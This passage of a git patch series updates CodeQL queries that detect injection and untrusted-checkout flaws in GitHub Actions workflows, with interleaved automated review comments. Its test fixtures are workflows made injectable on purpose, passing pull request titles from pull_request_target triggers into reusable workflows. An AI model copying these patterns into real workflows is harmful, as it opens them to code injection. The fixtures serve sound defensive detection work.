Step: email | .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test15.yml:231:7:236:4 | Uses Step | +| .github/workflows/test15.yml:231:7:236:4 | Uses Step | .github/workflows/test15.yml:236:7:242:4 | Run Step | +| .github/workflows/test15.yml:236:7:242:4 | Run Step | .github/workflows/test15.yml:242:7:250:4 | Uses Step | +| .github/workflows/test15.yml:242:7:250:4 | Uses Step | .github/workflows/test15.yml:250:7:270:4 | Uses Step | +| .github/workflows/test15.yml:250:7:270:4 | Uses Step | .github/workflows/test15.yml:270:7:271:45 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From 610dcaf23dfe2915c6451dc565ddb5f16254e247 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 12:31:19 +0200 Subject: [PATCH 523/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b4c388cf6152..84d4f5f3678e 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.50 +version: 0.1.51 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e5709a523298..0ef4c721e1a2 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.50 +version: 0.1.51 groups: [actions, queries] suites: codeql-suites extractor: javascript From 2bfb1565086edc3ab56d7dd1e19fcb0055658c1d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 23:08:58 +0200 Subject: [PATCH 524/707] d /Users/pwntester/src/github.com/github/codeql-actions/ql --- ql/lib/codeql/actions/ast/internal/Ast.qll | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d0eb440d0d53..7458cc1b0532 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -416,6 +416,12 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + override EventImpl getATriggerEvent() { + this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result + or + this.getOn().getAnEvent() = result and not result.getName() = "workflow_call" + } + OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } 
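Review bot: In the new `getATriggerEvent` override on `ReusableWorkflowImpl`, the caller-side disjunct `this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result` is not filtered for `workflow_call`, while the workflow's own events are, so a reusable workflow invoked from another reusable workflow should still report `workflow_call` as a trigger and never reach the real outer event. Making the caller branch recurse, `this.getACaller().getEnclosingWorkflow().getATriggerEvent() = result`, would follow nested callers and apply the same exclusion on both sides. The second hunk of this commit (`JobImpl.getATriggerEvent`, `@@ -796`) works around the gap by unioning `getACaller().getATriggerEvent()` at job level; with a recursive override that extra disjunct looks unnecessary. A one-line doc comment on the override, `/** Gets a trigger event of a caller workflow, or of this workflow's own on: block other than workflow_call. */`, would also explain why `workflow_call` is dropped.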
@@ -796,12 +802,11 @@ class JobImpl extends AstNodeImpl, TJobNode { StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + EventImpl getATriggerEvent() { + result = this.getEnclosingWorkflow().getATriggerEvent() or + result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + } - // private predicate hasSingleTrigger(string trigger) { - // this.getATriggerEvent().getName() = trigger and - // count(this.getATriggerEvent()) = 1 - // } /** Gets the runs-on field of the job. */ string getARunsOnLabel() { exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | From fe06c9e5fa186e27fbe1e2134926b08982a9dfef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 12:12:09 +0200 Subject: [PATCH 525/707] d /Users/pwntester/src/github.com/github/codeql-actions/ql --- ql/lib/codeql/actions/ast/internal/Ast.qll | 64 +++++++++++++++++-- .../codeql/actions/security/ControlChecks.qll | 2 +- .../CWE-829/UntrustedCheckoutCritical.ql | 33 ++++------ .../Security/CWE-829/UntrustedCheckoutHigh.ql | 33 ++++------ .../.github/workflows/documentation.yml | 2 +- .../CWE-078/CommandInjectionCritical.expected | 2 - .../CWE-078/CommandInjectionMedium.expected | 1 - .../workflows/reusable-workflow-caller-1.yml | 4 +- .../workflows/reusable-workflow-caller-2.yml | 4 +- .../CWE-094/CodeInjectionCritical.expected | 12 ++-- .../CWE-094/CodeInjectionMedium.expected | 12 ++-- .../.github/workflows/reusable_caller3.yaml | 2 +- .../UntrustedCheckoutCritical.expected | 2 - .../CWE-829/UntrustedCheckoutHigh.expected | 4 -- .../CWE-829/UntrustedCheckoutMedium.expected | 6 ++ 15 files changed, 102 insertions(+), 81 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7458cc1b0532..d05174f47878 100644 
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -417,8 +417,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } override EventImpl getATriggerEvent() { + // The trigger event for a reusable workflow is the trigger event of the caller workflow this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result or + // or the trigger event of the workflow if it has any other than workflow_call this.getOn().getAnEvent() = result and not result.getName() = "workflow_call" } @@ -803,8 +805,13 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the trigger event that starts this workflow. */ EventImpl getATriggerEvent() { - result = this.getEnclosingWorkflow().getATriggerEvent() or - result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + if this.getEnclosingWorkflow() instanceof ReusableWorkflowImpl + then + result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + or + result = this.getEnclosingWorkflow().getATriggerEvent() and + not result.getName() = "workflow_call" + else result = this.getEnclosingWorkflow().getATriggerEvent() } /** Gets the runs-on field of the job. */ @@ -844,9 +851,8 @@ class JobImpl extends AstNodeImpl, TJobNode { ) } - private predicate hasExplicitWritePermission() { - // the job has an explicit write permission - this.getPermissions().getAPermission().matches("%write") + private predicate hasExplicitNonePermission() { + exists(this.getPermissions()) and not exists(this.getPermissions().getAPermission()) } private predicate hasExplicitReadPermission() { 
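Review bot: The `then` branch of the rewritten `JobImpl.getATriggerEvent` filters `workflow_call` out of `this.getEnclosingWorkflow().getATriggerEvent()`, but for a `ReusableWorkflowImpl` that call already dispatches to the override touched in the first hunk (`@@ -417`), which drops `workflow_call` from the workflow's own `on:` block; the filter here therefore only catches `workflow_call` events contributed by the caller side of the override. Moving that exclusion (or a recursive `getATriggerEvent()` call) into the override itself would let this predicate collapse to the single line `result = this.getEnclosingWorkflow().getATriggerEvent()` for both kinds of workflow. Whichever shape is kept, the doc comment still reads `/** Gets the trigger event that starts this workflow. */` although the predicate belongs to a job and now follows caller chains; `/** Gets an event that can trigger this job, resolved through callers for reusable workflows (workflow_call itself is excluded). */` would match the new behaviour.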
@@ -855,15 +861,57 @@ class JobImpl extends AstNodeImpl, TJobNode { not this.getPermissions().getAPermission().matches("%write") } - private predicate hasImplicitWritePermission() { + private predicate hasExplicitWritePermission() { // the job has an explicit write permission - this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + this.getPermissions().getAPermission().matches("%write") + } + + private predicate hasImplicitNonePermission() { + not exists(this.getPermissions()) and + exists(this.getEnclosingWorkflow().getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getPermissions()) and + not exists( + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + ) } private predicate hasImplicitReadPermission() { // the job has not an explicit write permission + not exists(this.getPermissions()) and exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) and not this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + .matches("%read") + } + + private predicate hasImplicitWritePermission() { + // the job has an explicit write permission + not exists(this.getPermissions()) and + this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + .matches("%write") } private 
predicate hasRuntimeData() { @@ -922,6 +970,8 @@ class JobImpl extends AstNodeImpl, TJobNode { // and the job is not explicitly non-privileged not ( ( + this.hasExplicitNonePermission() or + this.hasImplicitNonePermission() or this.hasExplicitReadPermission() or this.hasImplicitReadPermission() ) and diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 1a47f4d92d02..1a3e1e15fe8c 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -38,7 +38,7 @@ abstract class ControlCheck extends AstNode { } predicate protects(Step step, Event event, string category) { - event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and + event = step.getEnclosingWorkflow().getATriggerEvent() and this.dominates(step) and this.protectsCategoryAndEvent(category, event.getName()) } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 9efd9b036cd1..31a4cdf94e54 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
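Review bot: The header comments on the new `hasImplicitReadPermission` and `hasImplicitWritePermission` bodies are carried over from the explicit variants (`// the job has an explicit write permission` now sits on the implicit write predicate, `// the job has not an explicit write permission` on the read one) and contradict the code, which inspects the enclosing workflow's or the caller job's `permissions:` block. Suggested wording: `// the job has no permissions block; the enclosing workflow, or the caller job of a reusable workflow, grants a write permission`, with matching read/none variants. Semantically, the disjuncts take a called workflow's own `permissions:` at face value whenever one exists, whereas GitHub only lets a called workflow downgrade the token handed over by the caller, so a reusable workflow that declares `write` under a caller with `permissions: {}` is modelled as privileged; that is a conservative over-approximation for these queries, but worth recording in a comment. It is also worth confirming that `getAPermission()` yields something for the scalar forms `permissions: read-all` / `write-all`, since `hasExplicitNonePermission` (previous hunk, `@@ -844`) and `hasImplicitNonePermission` treat "block present but no individual permission" as none.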
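Review bot: `protects` now constrains its `event` parameter with `step.getEnclosingWorkflow().getATriggerEvent()`, while both query call sites in this commit (`UntrustedCheckoutCritical.ql`, `UntrustedCheckoutHigh.ql`) bind the same `event` to `checkout.getEnclosingJob().getATriggerEvent()`; after this series those two predicates no longer compute the same set for reusable workflows (the job-level one adds the caller job's events and filters `workflow_call`), so for a nested reusable workflow `protects` may hold for no check at all and the checkout would be reported as unprotected. Using the job-level resolution here, `event = step.getEnclosingJob().getATriggerEvent() and`, keeps the control-check library and the queries on one definition of "trigger event". Alternatively drop the constraint and document that callers pass an event of the step's own job. The remainder of `protects` is outside this hunk.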
@@ -20,39 +20,28 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep step +from PRHeadCheckoutStep checkout, PoisonableStep step, Event event where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(checkout) and + event = checkout.getEnclosingJob().getATriggerEvent() and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event event | - event = checkout.getEnclosingJob().getATriggerEvent() and + event.getName() = "issue_comment" and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ( - event.getName() = "issue_comment" - or - event.getName() = "workflow_call" and - checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = - "issue_comment" + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck ) and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(checkout) and - date_check.dominates(checkout) - ) + check.dominates(checkout) and + date_check.dominates(checkout) ) or // not issue_comment triggered workflows - exists(Event event | - not event.getName() = "issue_comment" and - event = checkout.getEnclosingJob().getATriggerEvent() and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) - ) + not event.getName() = "issue_comment" and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) select step, checkout, step, "Execution of untrusted code on a privileged workflow." 
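Review bot: The issue_comment branch of the `where` clause (`event.getName() = "issue_comment" and not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ...)`) is repeated verbatim in `UntrustedCheckoutHigh.ql` (next hunk, `@@ -18,39 +18,28 @@`); since both queries import `codeql.actions.security.ControlChecks`, a shared predicate there, e.g. `predicate issueCommentCheckoutProtected(Step step)` holding the actor/association/permission check plus the `CommentVsHeadDateCheck` domination, would keep the two severities from drifting. Hoisting `event` into the `from` clause also means a checkout whose job resolves to several trigger events yields several `where` solutions; the `select` omits `event`, so rows dedupe, but the `not exists(ControlCheck check | check.protects(...))` disjunct now fires as soon as any single non-issue_comment event is unprotected, which is presumably the intended semantics and deserves a comment on that `or`.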
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index ce138fb04786..bc6f0e36e56e 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql 
@@ -18,39 +18,28 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout, Event event where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout) and + event = checkout.getEnclosingJob().getATriggerEvent() and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event event | - event = checkout.getEnclosingJob().getATriggerEvent() and + event.getName() = "issue_comment" and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ( - event.getName() = "issue_comment" - or - event.getName() = "workflow_call" and - checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = - "issue_comment" + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck ) and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(checkout) and - date_check.dominates(checkout) - ) + check.dominates(checkout) and + date_check.dominates(checkout) ) or // not issue_comment triggered workflows - exists(Event event | - not event.getName() = "issue_comment" and - event = checkout.getEnclosingJob().getATriggerEvent() and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) - ) + not event.getName() = "issue_comment" and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) select checkout, "Potential execution of untrusted code on a privileged workflow." 
diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml index 46ffbce96280..db04b69ac168 100644 --- a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml @@ -2,7 +2,7 @@ name: Documentation on: workflow_dispatch: - workflow_call: + pull_request: jobs: parse_commit_info: diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index e2fe23cccc67..decabad082fb 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected 
@@ -1,8 +1,6 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index ebbf2f7cf0b2..99ebb1edc05d 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,6 +1,5 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml index 9c0b72dffeac..a237856b6ce7 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -1,11 +1,11 @@ name: Caller on: - issue_comment: + pull_request_target: jobs: test: permissions: {} uses: ./.github/workflows/reusable-workflow-1.yml with: - taint: ${{ github.event.comment.body }} + taint: ${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml index 46be8d7009df..0f87d1e9394f 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -1,10 +1,10 @@ name: Caller on: - issue_comment: + pull_request_target: jobs: test: uses: ./.github/workflows/reusable-workflow-2.yml with: - taint: ${{ github.event.comment.body }} + taint: ${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 9ebd55088024..818b106b6d77 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -70,8 +70,8 @@ edges | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -287,8 +287,8 @@ nodes | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -451,9 +451,7 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | -| .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | ${{ env.log }} | -| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | +| .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | ${{ env.log }} | | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:19:15:19:47 | steps.source.outputs.value | ${{ steps.source.outputs.value }} | | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:57 | github.event['comment']['body'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected index 26d4741a4692..75b64cea3e59 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionMedium.expected 
@@ -70,8 +70,8 @@ edges | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
